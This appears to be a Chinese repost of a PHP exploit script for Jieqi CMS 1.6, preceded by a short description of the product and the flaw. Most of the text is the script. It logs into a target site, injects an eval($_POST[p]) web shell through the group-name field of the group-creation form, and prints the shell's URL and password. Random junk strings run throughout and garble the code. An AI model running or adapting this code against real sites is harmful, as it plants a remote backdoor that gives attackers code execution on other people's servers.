杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。+ ?: Z3 X$ y' ^% n3 {5 Q2 D7 Q; X
; ^. d$ R+ {3 b6 {6 O
X, q+ w& B$ y6 C# J该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
1 \) R+ |) I j3 Y( T X 需要有一个能创建圈子的用户。0 P& Z, ?, G9 z4 g" i. o
1 O2 P6 x: Y+ C0 V, {' l<?php
$ g4 y5 D ~- s$ H$ Z 5 ]+ C/ N% ?/ D
print_r('
/ n7 L! N8 n, s; U+ e+---------------------------------------------------------------------------+! i5 Y' f ?2 r/ K0 E
Jieqi CMS V1.6 PHP Code Injection Exploit% ~9 v; e* W2 i) H* e! r' p5 l
by flyh4t K4 ~& m) e. @; G& J
mail: phpsec at hotmail dot com: _0 v5 V& q6 \4 `; W% w
team: http://www.wolvez.org
# o$ H4 @& t! ?4 ~) p. K, W+---------------------------------------------------------------------------+
9 i& M% K( c+ o8 n'); /**/ ^' m5 N& G, Y, ?' {3 t* @" s
* works regardless of php.ini settings
" Y2 f1 o: i; A* l# w' a5 M*/ if ($argc < 5) { print_r('
( s# z# J6 M9 |, }' x) m+---------------------------------------------------------------------------+. [+ F8 X: ^! }+ f- d1 t
Usage: php '.$argv[0].' host path username& S! H: Q" I' \8 _% H1 r
host: target server (ip/hostname)
, j' A4 P1 _2 r) kpath: path to jieqicms
1 L6 Q+ k" ]# X3 Y1 X+ M% N) _5 E+ buasename: a username who can create group; X u$ Q& \7 p$ a+ b c! V6 H
Example:
5 [: ^, C/ C xphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
* F3 C, F8 v5 R" H( r+---------------------------------------------------------------------------+
$ n: o# \# s1 A0 ^'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961, L3 V) J% @7 g$ o
Content-Disposition: form-data; name="gname": H" \; I" Q6 q4 F! p
) q P0 x0 H9 H/ E'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
1 v& e9 V9 T+ ~/ t1 q9 {7 w4 Z-----------------------------23281168279961
. M# D" u) h: H& TContent-Disposition: form-data; name="gcatid"7 D- J6 D" i( P, r. C: U
8 ?% @3 V% j8 U1- r8 O: O% q. L/ u
-----------------------------23281168279961
: E$ X) B5 f6 R5 c) L# h6 i9 @% GContent-Disposition: form-data; name="gaudit"
1 x+ d/ ]+ y9 U! H! v
7 E$ Q/ Y0 }; Y0 C+ Z8 w1# a" G9 ~, @* g. y& o0 @8 c. u
-----------------------------23281168279961
4 l6 h6 J6 h3 g9 n- C- HContent-Disposition: form-data; name="gbrief"" c$ @$ M5 u% i. B4 |( z, t: H# q
+ H6 E, }4 Z8 q/ I7 q7 [
1
( m- E: B, i& n0 u7 j-----------------------------23281168279961--$ t& {7 x7 u, ^0 a+ h% n+ N
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
( u+ t( `0 f* A1 l
" B8 I0 q! Y+ K$ K" m( opreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |